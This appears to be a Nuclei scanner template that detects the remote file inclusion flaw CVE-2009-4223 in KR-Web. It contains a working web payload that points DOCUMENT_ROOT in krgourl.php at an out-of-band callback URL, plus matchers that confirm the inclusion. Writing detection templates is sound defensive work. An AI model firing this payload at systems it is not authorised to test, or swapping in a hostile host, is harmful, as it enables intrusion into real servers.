27 lines
779 B
YAML
27 lines
779 B
YAML
id: CVE-2009-4223
|
|
|
|
info:
|
|
name: KR-Web <= 1.1b2 RFI
|
|
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
|
|
reference:
|
|
- https://sourceforge.net/projects/krw/
|
|
- https://www.exploit-db.com/exploits/10216
|
|
author: geeknik
|
|
severity: high
|
|
tags: cve,cve2009,krweb,rfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|